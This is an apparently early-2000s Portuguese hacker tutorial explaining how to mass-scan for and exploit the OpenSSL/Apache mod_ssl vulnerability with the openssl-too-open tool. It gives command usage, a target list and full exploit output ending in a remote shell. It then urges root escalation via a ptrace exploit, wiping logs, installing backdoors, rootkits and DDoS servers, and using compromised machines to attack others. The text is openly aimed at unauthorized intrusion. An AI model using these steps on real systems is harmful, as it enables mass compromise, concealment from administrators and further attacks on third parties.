1 - Introdução
2 - Openssl-to-open
3 - Buscando vitimas
4 - Explorando
5 - D1cas
6 - Conclusão

1 - Introdução

Ae pessoal so eu o Stack de novo com mais uma técnica Hax0r pra vcs !!!

Foi descoberta uma vulnerabilidade no Apache, no OpenSSL que atinge as versoes 0.9.6d e anteriores essa vulnerabilidade
foi rapidamente usada para explorar milhares de sistemas, o worm slapper se propaga explorando essa vulnerabilidade.
Nesse TXT demonstrarei como explorar o sistema e ganhar uma shell nobody e depois se tornar root.

Requerimentos:

1 cérebro
1 Computador
1 teclado
1 mouse
- Internet
- linux
- openssl-to-open (veremos abaixo)

2 - OpenSSL-to-open

Essa é uma ferramenta que todo instruso pede a Deus ! ela tem um scanner em massa rapido podendo varrer centenas de
milhares de host em horas !! vem com o exploit tb para:

- Gentoo (apache-1.3.24-r2)
- Debian Woody GNU/Linux 3.0 (apache-1.3.26-1)
- Slackware 7.0 (apache-1.3.26)
- Slackware 8.1-stable (apache-1.3.26)
- RedHat Linux 6.0 (apache-1.3.6-7)
- RedHat Linux 6.1 (apache-1.3.9-4)
- RedHat Linux 6.2 (apache-1.3.12-2)
- RedHat Linux 7.0 (apache-1.3.12-25)
- RedHat Linux 7.1 (apache-1.3.19-5)
- RedHat Linux 7.2 (apache-1.3.20-16)
- Redhat Linux 7.2 (apache-1.3.26 w/PHP)
- RedHat Linux 7.3 (apache-1.3.23-11)
- SuSE Linux 7.0 (apache-1.3.12)
- SuSE Linux 7.1 (apache-1.3.17)
- SuSE Linux 7.2 (apache-1.3.19)
- SuSE Linux 7.3 (apache-1.3.20)
- SuSE Linux 8.0 (apache-1.3.23-137)
- SuSE Linux 8.0 (apache-1.3.23)
- Mandrake Linux 7.1 (apache-1.3.14-2)
- Mandrake Linux 8.0 (apache-1.3.19-3)
- Mandrake Linux 8.1 (apache-1.3.20-3)
- Mandrake Linux 8.2 (apache-1.3.23-4)

Ela é na verdade um pacote zipado lógico !!! na verdade só precisamos dela e dela pra ganhar o shell nobody !

pegue ela no packetstorm
http://packetstormsecurity.nl/

3- Buscando Vitimas

Lógicamente já disse acima que essa tool já vem com o scanner ! é facil usar mas como sou bonzinho vou ensinar

a tool

openssl-scanner scans a number of hosts for vulnerable OpenSSL
implementations.

: openssl-scanner : OpenSSL vulnerability scanner
by Solar Eclipse <[email protected]>

Usage: ./openssl-scanner [options] <host>
-i <inputfile> file with target hosts
-o <outputfile> output log
-a append to output log (requires -o)
-b check for big endian servers
-C scan the entire class C network the host belogs to
-d debug mode
-w N connection timeout in seconds

Examples: ./openssl-scanner -d 192.168.0.1
./openssl-scanner -i hosts -o my.log -w 5

Não entendeu vai ser burro lá na esquina ! tudo bem mais um exemplo !!!

$ ./openssl-scanner -C 192.168.0.0
: openssl-scanner : OpenSSL vulnerability scanner
by Solar Eclipse <[email protected]>

Opening 255 connections . . . . . . . . . . done
Waiting for all connections to finish . . . . . . . . . . . done

192.168.0.136: Vulnerable

Veja ele scanneia 192.168.0.0 até 192.168.0.255 e acha 1 pc bugado !
ele scanneou apenas a classe C ou seja a ultima parte do IP * logicamente ele scanneia classes B tb !!!!

Linha acima é bastante pequena, vc pode usar de modo inteligente varrendo algumas centenas de milhares de ips q é
o q qualquer um com 5 neuronios ou mais faria assim vc teria dezenas de pcs a explorar !!!!
nao vai querer outro exemplo né ? acho q ja deu pra entender é sí varrer as classes B !!!!!!!

4- Explorando

Para explorar tb é mole !

Usage: ./openssl-too-open [options] <host>
-a <arch> target architecture (default is 0x00)
-p <port> SSL port (default is 443)
-c <N> open N apache connections before sending the shellcode (default is 30)
-m <N> maximum number of open connections (default is 50)
-v verbose mode

Supported architectures:
0x00 - Gentoo (apache-1.3.24-r2)
0x01 - Debian Woody GNU/Linux 3.0 (apache-1.3.26-1)
0x02 - Slackware 7.0 (apache-1.3.26)
0x03 - Slackware 8.1-stable (apache-1.3.26)
0x04 - RedHat Linux 6.0 (apache-1.3.6-7)
0x05 - RedHat Linux 6.1 (apache-1.3.9-4)
0x06 - RedHat Linux 6.2 (apache-1.3.12-2)
0x07 - RedHat Linux 7.0 (apache-1.3.12-25)
0x08 - RedHat Linux 7.1 (apache-1.3.19-5)
0x09 - RedHat Linux 7.2 (apache-1.3.20-16)
0x0a - Redhat Linux 7.2 (apache-1.3.26 w/PHP)
0x0b - RedHat Linux 7.3 (apache-1.3.23-11)
0x0c - SuSE Linux 7.0 (apache-1.3.12)
0x0d - SuSE Linux 7.1 (apache-1.3.17)
0x0e - SuSE Linux 7.2 (apache-1.3.19)
0x0f - SuSE Linux 7.3 (apache-1.3.20)
0x10 - SuSE Linux 8.0 (apache-1.3.23-137)
0x11 - SuSE Linux 8.0 (apache-1.3.23)
0x12 - Mandrake Linux 7.1 (apache-1.3.14-2)
0x13 - Mandrake Linux 8.0 (apache-1.3.19-3)
0x14 - Mandrake Linux 8.1 (apache-1.3.20-3)
0x15 - Mandrake Linux 8.2 (apache-1.3.23-4)

Examples: ./openssl-too-open -a 0x01 -v localhost
./openssl-too-open -p 1234 192.168.0.1 -c 40 -m 80

Exemplos:

host bugado: 192.168.0.136

vamos usar o netcat

$ nc 192.168.0.1 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Tue, 17 Sep 2002 17:47:44 GMT
Server: Apache-AdvancedExtranetServer/1.3.20 (Mandrake Linux/3mdk) mod_ssl/2.8.4 OpenSSL/0.9.6b
Connection: close
Content-Type: text/html

explorando:

./openssl-too-open -a 0x14 192.168.0.1
: openssl-too-open : OpenSSL remote exploit
by Solar Eclipse <[email protected]>

: Opening 30 connections
Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x810b3a0
ssl1 : 0x810b360
ssl2 : 0x810b4e0

* Addresses don't match.

: Opening 40 connections
Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x8103830
ssl1 : 0x80fd668
ssl2 : 0x80fd668

* Addresses don't match.

: Opening 50 connections
Establishing SSL connections

: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x8103830
ssl1 : 0x8103830
ssl2 : 0x8103830

: Sending shellcode
ciphers: 0x8103830 start_addr: 0x8103770 SHELLCODE_OFS: 184
Reading tag
Execution of stage1 shellcode succeeded, sending stage2
Spawning shell...

bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a; id; w;
Linux localhost.localdomain 2.4.8-26mdk #1 Sun Sep 23 17:06:39 CEST 2003 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache)
1:49pm up 4:26, 1 user, load average: 0.04, 0.07, 0.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
bash-2.05$

-@@@@@

Fácil né usamos netcat pra saber o sistema e o server e saber qual opção usar no caso 0x14 caso vc nao conseguir
obter a versão pois mecheram no banner, ou pq vc é burro vc pode chutar todas as opções são 22!!!!!

Se o admin for burro e rodar o apache com privilégios de root vc obtem root facinho dp de executar o exploit !
porém é provavel q isso nao aconteça e entao vc terá privilégios de nobody ! mas isso nao vai durar mto!!!

5- D1cas

ROOT

Bom vamos logo dominar o sistema né ! vamos sair dessa droga de nobody !!!
Para ganhar ROOT é simples é só usar o ptrace baixe ele no packetstorm http://packetstormsecurity.nl/
se nao sabe usar leia o txt q acompanha ele !!!!!!!! lógicamente ele é xploit local se tem q baixar pra maquina
da vitima duh !!!!!

Logs

O Zap é o melhor prog pra limpar os logs baixe ele no mesmo site acima

Backdoors & Rootkit

Após se tornar root ! até o mais idioa dos invasores irá instalar algum tipo de backdoor ou rootkit para ter
acesso ao sistema ! isso é muito importante lembre-se vc deve ser o tipo de hacker "Never say goodbye"
lembre-se a hackers q tem centenas, até milhares de shells !

DDoS

Instale um server DDoS na vitma caso queira pode ser bastante útil !

* Pra quem nao sabe como baixar os arquivos do prompt de comando use o Wget ! AH!! lembrou né ? bom !

* Uma boa dica é instalar um server de ftp no seu pc ! para q do pc hackiado vc possa com facilidade transferir
arquivos ! todo hax0r faz isso !

* Limpe sempre o log

* Nao disperdice uma shell backdorize !!

* Use essa shell pra atacar outros pcs ! baixe o openssl-to-open pra ela tb e assim seu pc mais os outros q vc
invadiu scanneando junto podem varrer milhoes de hosts bem mais rapido !

* Guarde seus arquivos em um lugar bem escondido ! hacker "Elitoes" costumao instalar um rootkit em LKM como eles
modificam o sistema é possivel com ele impedir q determinador arquivos seja vistos ! é isso mesmo !
vc pode guardar tudo no diretorio /hacker q o admin vai da um ls / e nao aparece nda ! só o dono do rootkit vê !
faça isso tb ! no packetstorm a varios rootkits ! a equipe da TESO desenvolveu um mto bom tb !!!!
tipo se vc nao sabe nda de rootkit procure no google se informar pois sao ferramentas mto poderosas!

6-Conclusão

Pessoal aki acabou nosso TXT pretendo ensinar novas técnicas de invasão a linux ! meu proximo txt ensinara a invadir
um Solaris q todo mundo acha impenetravel !!! espero q tenham gostado do TXT caso queiram algum TXT sobre
um assunto interessante peçam pelo ICQ

Aí pessoal até a proxima !!!!

By Stack